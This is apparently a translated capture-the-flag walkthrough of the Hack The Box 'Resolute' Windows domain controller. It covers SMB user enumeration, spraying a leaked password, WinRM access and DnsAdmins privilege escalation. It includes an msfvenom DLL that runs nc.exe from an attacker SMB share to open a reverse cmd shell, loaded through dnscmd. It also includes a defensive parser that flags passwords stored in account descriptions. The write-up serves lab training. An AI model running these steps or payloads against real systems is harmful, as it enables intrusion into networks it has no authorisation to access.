If you want to play this target online, you first need to register an account on the Hackthebox platform. For the specific steps, see my previous article, a step-by-step guide to registering on and using the Hackthebox platform.
Introduction
Through this penetration test we can learn:
1. Use of the rpcclient tool
2. Use of the enum4linux tool
3. Use of the msfvenom tool (veil will be covered later; the .exe files generated by veil have a chance of not being flagged by 360 antivirus)
4. The DnsAdmins group privilege escalation vulnerability
Preliminary preparation
1. Edit the hosts file and scan the ports. Note that this is nmap's fast scan mode, so some ports may be missed. If the ports found by the fast scan do not give you a way in,
use the -p parameter as much as possible. For example, the redis and winrm ports are sometimes not found by the fast scan; you must use -p to scan those specific ports.
nmap -A resolute > port
root@kali:~/Hackthebox/resolute# cat port
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-14 15:09 CST
Nmap scan report for resolute (10.10.10.169)
Host is up (0.17s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-14 07:17:43Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Ports of interest: smb (port 445), winrm (port 5986)
2. Collect information about the SMB service: use enum4linux to gather information about the SMB server.
The -U parameter enumerates the user list and displays related information.
For more parameters, see enum4linux -h.
root@kali:~# enum4linux -U resolute
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jan 18 18:50:20 2020

 ==========================
|    Target Information    |
 ==========================
Target ........... resolute
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ================================================
|    Enumerating Workgroup/Domain on resolute    |
 ================================================
[E] Can't find workgroup/domain

 =================================
|    Session Check on resolute    |
 =================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server resolute allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:

 =======================================
|    Getting domain SID for resolute    |
 =======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: MEGABANK
Domain Sid: S-1-5-21-1392959593-3013219662-3596683436
[+] Host is part of a domain (not a workgroup)

 =========================
|    Users on resolute    |
 =========================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
enum4linux complete on Sat Jan 18 18:50:44 2020
One line of this listing is very important:
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
Account marko, password Welcome123!. Try logging in with rpcclient:
rpcclient -U marko resolute
Entering this password returns an error.
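The same user listing is what a defender should audit: a password written into an account's description attribute is readable by any authenticated user, and the acb field also reveals accounts whose password never expires. The parser below is an added example (not from the original article or from enum4linux); it reads enum4linux "index:" records, decodes the ACB_DISABLED, ACB_PWNOTREQ and ACB_PWNOEXP bits, and flags enabled accounts whose description looks like it carries a credential. The SAMPLE string is a constructed four-record excerpt modelled on the listing above.

```python
import re

# Samba/SAMR account-control bits (ACB_*) behind enum4linux's "acb:" field.
ACB_DISABLED, ACB_PWNOTREQ, ACB_PWNOEXP = 0x0001, 0x0004, 0x0200

# One match per "index:" record in the enum4linux user listing.
USER_RE = re.compile(
    r"index:\s*0x[0-9a-f]+\s+RID:\s*(0x[0-9a-f]+)\s+acb:\s*(0x[0-9a-f]+)\s+"
    r"Account:\s*(\S+)\s+Name:\s*(.*?)\s+Desc:\s*(.*?)(?=\s+index:|\s*$)",
    re.IGNORECASE | re.DOTALL,
)
# Words that suggest a secret was typed into the description attribute.
SECRET_RE = re.compile(r"\b(password|passwd|pwd|pass)\b", re.IGNORECASE)

def parse_users(text):
    """Return one dict per account, with the ACB flags decoded."""
    users = []
    for rid, acb, account, name, desc in USER_RE.findall(text):
        flags = int(acb, 16)
        users.append({
            "account": account,
            "rid": int(rid, 16),
            "name": None if name == "(null)" else name,
            "desc": None if desc.strip() == "(null)" else desc.strip(),
            "disabled": bool(flags & ACB_DISABLED),
            "pw_not_required": bool(flags & ACB_PWNOTREQ),
            "pw_never_expires": bool(flags & ACB_PWNOEXP),
        })
    return users

def find_findings(users):
    """Flag enabled accounts with credential-like descriptions or non-expiring passwords."""
    findings = []
    for u in users:
        if u["disabled"]:
            continue  # disabled accounts are reported separately, not as live risks
        if u["desc"] and SECRET_RE.search(u["desc"]):
            findings.append((u["account"], "credential-like text in description"))
        if u["pw_never_expires"]:
            findings.append((u["account"], "password never expires"))
    return findings

# Constructed sample: four records modelled on the listing above, not the full output.
SAMPLE = (
    "index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null) "
    "index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain "
    "index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123! "
    "index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)"
)
```

Running find_findings(parse_users(SAMPLE)) reports marko twice (description text and non-expiring password) and ryan once (non-expiring password); Guest is skipped because its acb has the disabled bit set.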
Getting user privileges
1. Try this password against the other users. There are two ways: try manually, or use hydra. The second is used here.
hydra -L username.txt -p Welcome123! resolute

The password from the description turns out to be the password of the user melanie.
2. With a valid account and password, try logging in to the SMB server. List the shares first.
root@kali:~/Hackthebox/resolute# smbclient -U melanie -L resolute
Enter WORKGROUP\melanie's password:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available
Use the following command to enter one of the SMB server's shared folders:
smbclient -U melanie //resolute/<dirname>
After looking through them, I did not find any valuable information.
3. Log in via WinRM (Windows Remote Management)
The tool evil-winrm.rb is needed here (github address in the references).
Log in to WinRM:
root@kali:~/Hackthebox/tools/evil-winrm# ruby evil-winrm.rb -u melanie -p Welcome123! -i 10.10.10.169

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> cd /Users
*Evil-WinRM* PS C:\Users> ls

    Directory: C:\Users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/25/2019  10:43 AM                Administrator
d-----        12/4/2019   2:46 AM                melanie
d-r---       11/20/2016   6:39 PM                Public
d-----        1/18/2020   3:28 AM                ryan
At this point user-level access has been obtained. Note that there is also a user ryan in this directory.
Collecting information
1. After obtaining user-level access, we should try to escalate privileges. First, check the groups of the current user.
*Evil-WinRM* PS C:\Users\melanie\Desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192
The current user's permissions are ordinary.
2. Knowing that the current user has no special privileges, we should focus on gathering information, which here means browsing "suspicious" folders and files.
Make good use of two parameters of the ls command:
-Force shows all files, including hidden ones.
-Hidden shows only hidden files.
*Evil-WinRM* PS C:\> ls -hidden

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        1/17/2020   5:52 PM      402653184 pagefile.sys
Notice the PSTranscripts folder. A folder like this that is not part of the system and has an attractive name (this one contains the word "script") deserves attention.
At the bottom of the folder tree there is a txt file:
*Evil-WinRM* PS C:\PSTranscripts\20191203> ls -hidden

    Directory: C:\PSTranscripts\20191203

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
Open it and have a look: it is a PowerShell transcript log, and it contains important information.

It appears to be the password of the user ryan: Serv3r4Admin4cc123!
3. Log in again with evil-winrm, this time as ryan, and view the groups the user belongs to.
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
The user ryan belongs to the DnsAdmins group. Searching Baidu and Google for DnsAdmin leads to:
Important: DnsAdmins security vulnerability (reposted from Medium)
Put simply, a DNS administrator (member of DnsAdmins) has read and write permission on the DNS server and can even tell the server to load a DLL of our choosing (the original article refers to the ServerLevelPluginDll setting) without
verifying the path of the loaded DLL. The command to set it is:
dnscmd.exe /config /serverlevelplugindll \pathtodll
Privilege escalation
1. Having learned from the earlier experiments, the description above naturally puts us on alert.
Here we use msfvenom to generate the reverse-shell DLL automatically. Before that, complete the following steps:
(1) Download the reverse shell file nc.exe:
netcat official download address (requires a proxy from mainland China)
netcat Baidu netdisk address (extraction code: 6ksg)
(2) Quickly set up an SMB server:
Download it from github (the impacket repository).
Run the command python3 setup.py install to install it.
Generate a DLL that launches the reverse shell. Here the windows/x64/exec module is used with a custom command; view the required parameters first:
msf5 payload(windows/x64/exec) > show options

Module options (payload/windows/x64/exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        yes       The command string to execute
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
Only the CMD parameter is required.
Use the following command to generate the DLL with the custom command:
msfvenom -p windows/x64/exec CMD='\\10.10.14.32\tools\nc.exe 10.10.14.32 6666 -e cmd.exe' -f dll > reverse.dll

2. Start the SMB service. nc.exe and reverse.dll must be in the shared folder, and the share name must match the name used in the msfvenom command, here tools.
root@kali:~/Hackthebox/resolute/tools# smbserver.py tools ./
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
3. Load the DLL we prepared. Because the command is executed remotely, the IP address or host name must follow dnscmd.exe.
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe resolute /config /serverlevelplugindll \\10.10.14.32\tools\reverse.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents>
Restart the DNS service:
sc.exe \\resolute stop dns
sc.exe \\resolute start dns
View the SMB server logs:

View the listening port:

The whole penetration process is over; system privileges have been obtained.
Reference material
[1] Reference article: https://blog.csdn.net/sdihvai/article/details/104031562
[2] evil-winrm github address: https://github.com/Hackplayers/evil-winrm
[3] DnsAdmins security vulnerability (reposted from Medium): https://www.anquanke.com/post/id/86080
[4] netcat official download address (requires a proxy from mainland China): https://eternallybored.org/misc/netcat/
[5] netcat Baidu netdisk address: https://pan.baidu.com/s/15PkUoZYXHlBoD7LuV36PKQ
[6] impacket github download: https://github.com/SecureAuthCorp/impacket